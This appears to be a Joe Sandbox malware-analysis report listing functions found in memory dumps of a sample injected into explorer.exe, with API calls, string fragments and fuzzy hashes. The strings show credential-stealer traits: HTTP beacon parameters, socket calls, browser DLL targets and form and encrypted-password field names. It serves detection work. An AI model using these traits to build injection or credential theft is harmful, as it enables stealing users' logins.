Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 30887ae75fab6c0d2954211f0b49fe12682031a5d5c390de6705b174d8ec252a
Instruction ID: 3919a05da8a9e0027b1f56f7e8ad51c0eb498b8712235a21bffdce1209a6d37a
Opcode Fuzzy Hash: 30887ae75fab6c0d2954211f0b49fe12682031a5d5c390de6705b174d8ec252a
Instruction Fuzzy Hash: 2CE18B70608742DFD766CF28C884B2AFBE0BB84714F144A6DF9A58B2E1D774D945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0171BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 01757BAC
RTL: Resource at %p, xrefs: 01757B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01757B7F

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: b4bb895369d2630c241d5a9372aab162cf5f6f3df9f774c457d4caec0498c4c9
Instruction ID: b1fbfbea7ac871f4d79518faa3d9e4fa77171c2e7b33e910407aa21fe238d1af
Opcode Fuzzy Hash: b4bb895369d2630c241d5a9372aab162cf5f6f3df9f774c457d4caec0498c4c9
Instruction Fuzzy Hash: 6841B0317047029FD725DE2DC840B6AF7E9EB98710F100A2DF95A9B684DB71E9058B91

Uniqueness

Uniqueness Score: -1.00%

Function 0171B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0175728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01757294
RTL: Re-Waiting, xrefs: 017572C1
RTL: Resource at %p, xrefs: 017572A3

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 7deed3461a032fcc0af54699cf0a93f49f916a87a5709b535a5e236433031c48
Instruction ID: d53a34d191d86e46b3ab184f9075e9598fa6f509c3e5be69b3f651d63e5386e6
Opcode Fuzzy Hash: 7deed3461a032fcc0af54699cf0a93f49f916a87a5709b535a5e236433031c48
Instruction Fuzzy Hash: E541FD31648206ABDB24CE2ACC41B6AFBB5FB98750F104619FD55EB280DB71E8428BD1

Uniqueness

Uniqueness Score: -1.00%

Function 01792300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0179238D
___swprintf_l.LIBCMT ref: 017923B3

Strings

%%%u, xrefs: 01792384
]:%u, xrefs: 017923AA

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: b48d3271bcfd9338e56db3c9b1c93865c80665d0d0eb40b1706961e7bd06e19b
Instruction ID: 18d635c7ac1537a6d67d8ed1750dc5035fa90977cc6649eaab85d055182808da
Opcode Fuzzy Hash: b48d3271bcfd9338e56db3c9b1c93865c80665d0d0eb40b1706961e7bd06e19b
Instruction Fuzzy Hash: B1318672A00219AFDF20DE2DEC40BEEF7F8EB54610F554559E949E3245EB309A498BA0

Uniqueness

Uniqueness Score: -1.00%

Function 01727D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01727E8B

Strings

+, xrefs: 01727DE8
-, xrefs: 01727DDD

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 5b07ad2e5d412cdf570150d72645bba057f2e6db39a67ad43184160f409c547e
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: FE91D571E042369BEB28DF6DCA81ABEFBA1FF64320F14451AE955E72C4D73089438721

Uniqueness

Uniqueness Score: -1.00%

Function 016E9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 016E9191
@, xrefs: 016E9175

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: b3b3c23fda5a3a0e677efa5b8257d5a2782c688ed854c25a56aed286936c5f09
Instruction ID: 2d809180ec0fb774440ba12f791727291973ce8194449404fbcfe50e94128a51
Opcode Fuzzy Hash: b3b3c23fda5a3a0e677efa5b8257d5a2782c688ed854c25a56aed286936c5f09
Instruction Fuzzy Hash: 04812B71D012699BDB31CB54CC48BEEBBB4AF08754F1041EAEA19B7281D7309E85CFA4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exePID: 2592, Parent PID: 7052COMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.7%
Total number of Nodes:	444
Total number of Limit Nodes:	16

Executed Functions

Function 10E29F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 10E2A12E
setsockopt.WS2_32 ref: 10E2A830
recv.WS2_32 ref: 10E2A859

Strings

dat=, xrefs: 10E2A290
&br=, xrefs: 10E2A509
&sql, xrefs: 10E2A471
Co, xrefs: 10E2A323
&un=, xrefs: 10E2A4F1
GET , xrefs: 10E2A318
nnec, xrefs: 10E2A32A
tion, xrefs: 10E2A331
: cl, xrefs: 10E2A338
ose, xrefs: 10E2A33F

Memory Dump Source

Source File: 00000003.00000002.3812550512.0000000010D50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d50000_explorer.jbxd

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 1564272048-1117930895
Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction ID: d82935a04c23d9b9cfaabbabc158ca29ee566d3883b75905950ff3f9058c143b
Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction Fuzzy Hash: B152B031614B088FCB59EF69E4847EAB7E1FB58304F94462ED4AFC7152DE30A949CB81

Uniqueness

Uniqueness Score: -1.00%

Function 10E29232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL ref: 10E29449

Strings

`, xrefs: 10E2941D

Memory Dump Source

Source File: 00000003.00000002.3812550512.0000000010D50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d50000_explorer.jbxd

Similarity

API ID: CreateFile
String ID: `
API String ID: 823142352-2679148245
Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction ID: d6b443690b1a533f719c3e809d10a71e60e2276bfa44a5352769a23741e65a4d
Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction Fuzzy Hash: 78225970A18A499FCB89DF29D4956AEF7E1FB98344F81122EE45ED3250DB30E851CB81

Uniqueness

Uniqueness Score: -1.00%

Function 10E2AE12 Relevance: 1.6, APIs: 1, Instructions: 59
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 10E2AE67

Memory Dump Source

Source File: 00000003.00000002.3812550512.0000000010D50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d50000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction ID: 67a6425e2cd6e64941831afb7955ea99665d1f097958555a061d6912d896db3a
Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction Fuzzy Hash: 3F01B134628B884F8788EF6CE48122AB7E4FBCD314F000B3EE99AC3250EB70C5414B42

Uniqueness

Uniqueness Score: -1.00%

Function 10E2AE0A Relevance: 1.6, APIs: 1, Instructions: 52
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 10E2AE67

Memory Dump Source

Source File: 00000003.00000002.3812550512.0000000010D50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d50000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction ID: 2aeb6afc8dd09d97b1b0f9014288761434f97a2157f4392ce55c128ed3010ed1
Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction Fuzzy Hash: 8501A234628B884B8748EB2C94412AAB3E5FBCE314F400B3EE9DAC3240DB21D5024B82

Uniqueness

Uniqueness Score: -1.00%

Function 10E248C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 10E249A0

Strings

on.d, xrefs: 10E24902
urlmon.dll, xrefs: 10E24959
User-Agent: , xrefs: 10E24935, 10E24948
nt: , xrefs: 10E2491E

Memory Dump Source

Source File: 00000003.00000002.3812550512.0000000010D50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d50000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 9c420cef16df85dcba0e64e2319e45dd2187888c2e7d88904d06f46196bc570c
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: B331F130A10A0C8FCF01EFA9D8857EEB7E1FB58204F80022AE45ED7240DF749A44C789

Uniqueness

Uniqueness Score: -1.00%

Function 10E248BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 10E249A0

Strings

on.d, xrefs: 10E24902
urlmon.dll, xrefs: 10E24959
User-Agent: , xrefs: 10E24935, 10E24948
nt: , xrefs: 10E2491E

Memory Dump Source

Source File: 00000003.00000002.3812550512.0000000010D50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d50000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 736be2677d51e435af21927b43de70548c22e20c10214c8affb0dadf9ef10564
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 4D21D570A10A4D8BCF05DFA9D8457EEBBF1FF58204F80421AE45AD7240DF749645C785

Uniqueness

Uniqueness Score: -1.00%

Function 10E20B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 10E20CCA

Strings

.dll, xrefs: 10E20BCD
kern, xrefs: 10E20B99
el32, xrefs: 10E20BA0

Memory Dump Source

Source File: 00000003.00000002.3812550512.0000000010D50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d50000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction ID: 486bb1c6bee06f0bb06777fe1590ef00eab3c2bc9bd9030fa6220970c675ecb4
Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction Fuzzy Hash: 18417C74918A088FDB84EFA8D8D5BAD7BE1FF58300F40417AD84AEB256DE309945CB85

Uniqueness

Uniqueness Score: -1.00%

Function 10E20B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 10E20CCA

Strings

.dll, xrefs: 10E20BCD
kern, xrefs: 10E20B99
el32, xrefs: 10E20BA0

Memory Dump Source

Source File: 00000003.00000002.3812550512.0000000010D50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d50000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction ID: 1dc1542ffb48b34d2f9ef31307f437f1da30016ebab72cb805a55b23889fb906
Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction Fuzzy Hash: 95416C74918A088FCB84EFA8D889BAD77E1FF68300F40416AD84AEB255DE309945CB85

Uniqueness

Uniqueness Score: -1.00%

Function 10E2672E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 10E26791

Strings

conn, xrefs: 10E2675A
ect, xrefs: 10E26761

Memory Dump Source

Source File: 00000003.00000002.3812550512.0000000010D50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d50000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction ID: d8b4a59e20568fb3b78f410f122a59985db618452da655335b3176d1420a403d
Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction Fuzzy Hash: D4010C74618B188FCB84EF5CE088B55B7E0EB59324F1545AEA90DCB266CA74D9818BC2

Uniqueness

Uniqueness Score: -1.00%

Function 10E26732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 10E26791

Strings

conn, xrefs: 10E2675A
ect, xrefs: 10E26761

Memory Dump Source

Source File: 00000003.00000002.3812550512.0000000010D50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d50000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction ID: a104f9508e8d440ee5a95ecdfbb1002d84a3624df4cf871dbdff5348e1211716
Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction Fuzzy Hash: 39012C70618A1C8FCB84EF5CE088B55B7E0FB59324F1541AEA80DCB226CB74CD818BC2

Uniqueness

Uniqueness Score: -1.00%

Function 10E266B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 10E26713

Strings

send, xrefs: 10E266DA

Memory Dump Source

Source File: 00000003.00000002.3812550512.0000000010D50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d50000_explorer.jbxd

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction ID: 47e1637fd2d202900940ecd35b2cdf28e827dc32e91388b51562b42e8fabb5f6
Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction Fuzzy Hash: 55011270518A588FDB84DF1CE049B1577E0EB58314F5646AED85DCB266CA70D8818B81

Uniqueness

Uniqueness Score: -1.00%

Function 10E265B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 10E26611

Strings

sock, xrefs: 10E265D9

Memory Dump Source

Source File: 00000003.00000002.3812550512.0000000010D50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d50000_explorer.jbxd

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction ID: 4384cb91d3c059cda389251b8ef505c4d375fe0a304bbc8076853a95ba11024e
Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction Fuzzy Hash: 61014F70618A5C8FCB84EF1CE048B54BBE0FB59354F1545AEE85ECB266C7B0C981CB86

Uniqueness

Uniqueness Score: -1.00%

Function 10E1E2DD Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 10E1E32D

Memory Dump Source

Source File: 00000003.00000002.3812550512.0000000010D50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d50000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction ID: bf5e0552c62083204fdd18cea4d02c124fa1eb7d44bbcc38d8b677e4056af45e
Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction Fuzzy Hash: 8D316A74A04B49DBDB58DF2A8088295F7A1FB54304F44467EE96DCB206CB70A890CF91

Uniqueness

Uniqueness Score: -1.00%

Function 10E1E412 Relevance: 1.5, APIs: 1, Instructions: 46
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32 ref: 10E1E461

Memory Dump Source

Source File: 00000003.00000002.3812550512.0000000010D50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d50000_explorer.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction ID: d62dbfa4386cd459fe4f698f359ecbdd08ec7cb885b0ed93e252e45e76ed3f41
Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction Fuzzy Hash: 29F0F634668E494FDB88EF2CD44663AF3D0FBE8214F41063EA54DC7264DE39D5814756

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 102C4D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

S, xrefs: 102C5073
kern, xrefs: 102C4F5A
user, xrefs: 102C4F03
32.d, xrefs: 102C4F0B
dll, xrefs: 102C4F4C
el32, xrefs: 102C4F27
M, xrefs: 102C5082
ll, xrefs: 102C4F13
wini, xrefs: 102C4F72
net., xrefs: 102C4F44
.dll, xrefs: 102C4F2F

Memory Dump Source

Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10260000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: 78dce04337d359188076389bad55b8f7eaba4b240ed33a9c96867fa4c4233e9b
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: BAE15974618B488FCBA5DF68C5857ABB7E0FB58300F504A2EA59FC7245DF30A541CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 102C7792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

itUR, xrefs: 102C785D
e, xrefs: 102C78BD
name, xrefs: 102C787D
rnam, xrefs: 102C78B5
user, xrefs: 102C7876
Subm, xrefs: 102C7855
ypte, xrefs: 102C78A5
swor, xrefs: 102C78EA
guid, xrefs: 102C77CE
ypte, xrefs: 102C78DA
dUse, xrefs: 102C78AD
d, xrefs: 102C78F2
dPas, xrefs: 102C78E2
Fiel, xrefs: 102C7884
encr, xrefs: 102C78D2
form, xrefs: 102C784D
encr, xrefs: 102C789D

Memory Dump Source

Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10260000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: 60ecda5a1f38b88a42c65d04235855a4e112f496b4591a6aa3cae6e1d949664a
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: E1B18A70518B488FDB55EF68C486AEEB7F1FF98300F50461EE49AC7251EF70A4158B86

Uniqueness

Uniqueness Score: -1.00%

Function 102C5622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

d, xrefs: 102C567B
e, xrefs: 102C566D
d, xrefs: 102C56A5
w, xrefs: 102C56B3
n, xrefs: 102C56C1
s, xrefs: 102C5689
l, xrefs: 102C56D6
c, xrefs: 102C5697
p, xrefs: 102C5690
l, xrefs: 102C5682
u, xrefs: 102C5661
t, xrefs: 102C56C8
i, xrefs: 102C569E
2, xrefs: 102C5674
l, xrefs: 102C56AC
d, xrefs: 102C56CF
n, xrefs: 102C56BA

Memory Dump Source

Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10260000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: b29a5373d55bb65382cfd5801e404a3a44993b6d4f287ab6fb44721b8acfd291
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: E441B370A18B18CFDB14DF88A4467ADBBE2FB88740F00025EE809D7245DBB5DD958BD6

Uniqueness

Uniqueness Score: -1.00%

Function 102CCAB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

[, xrefs: 102CCC66
b, xrefs: 102CCC73
[, xrefs: 102CCC90
l, xrefs: 102CCCE2
D, xrefs: 102CCCDA
], xrefs: 102CCC3D
e, xrefs: 102CCCA0
[, xrefs: 102CCBF6
], xrefs: 102CCCA8
n, xrefs: 102CCC98
l, xrefs: 102CCC35
[, xrefs: 102CCC2D
c, xrefs: 102CCC0B
[, xrefs: 102CCCCD

Memory Dump Source

Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10260000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: 39a8e6eff5d2bbacc9379a3cbc2a26de6c4bc7d787faf28cb636ae9b81395528
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: 0DC14A75218B099BC758EF24C486BEAF3E5FB94304F50472AA49AC7250DF70F625CB86

Uniqueness

Uniqueness Score: -1.00%

Function 102CCF12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

r, xrefs: 102CCF90
r, xrefs: 102CCF88
n, xrefs: 102CCF6B
r, xrefs: 102CCFA8
c, xrefs: 102CCFC8
r, xrefs: 102CCFA0
0, xrefs: 102CCF5B
., xrefs: 102CCF63
r, xrefs: 102CCFB8
r, xrefs: 102CCFC0
r, xrefs: 102CCF98
r, xrefs: 102CCFB0

Memory Dump Source

Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10260000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: 3328eddb0c5f26e5a757f1f8ded51eede87b18e6b86bfceb033112be7ac2af7d
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: AF51D5305187488FD709DF18D9817AAB7E5FBC5700F501A2EE8CBC7242DBB4A956CB82

Uniqueness

Uniqueness Score: -1.00%

Function 102C62F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

nspr, xrefs: 102C64D4
dragon_s.dll, xrefs: 102C6614
l, xrefs: 102C64E2
4.dl, xrefs: 102C64DB
opera_browser.dll, xrefs: 102C6629
cli., xrefs: 102C6327
sspi, xrefs: 102C6320
dll, xrefs: 102C632E

Memory Dump Source

Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10260000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: 0d86212690a14ab089913100eeba5e73b653a7d2913cc140c978657c7860e440
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
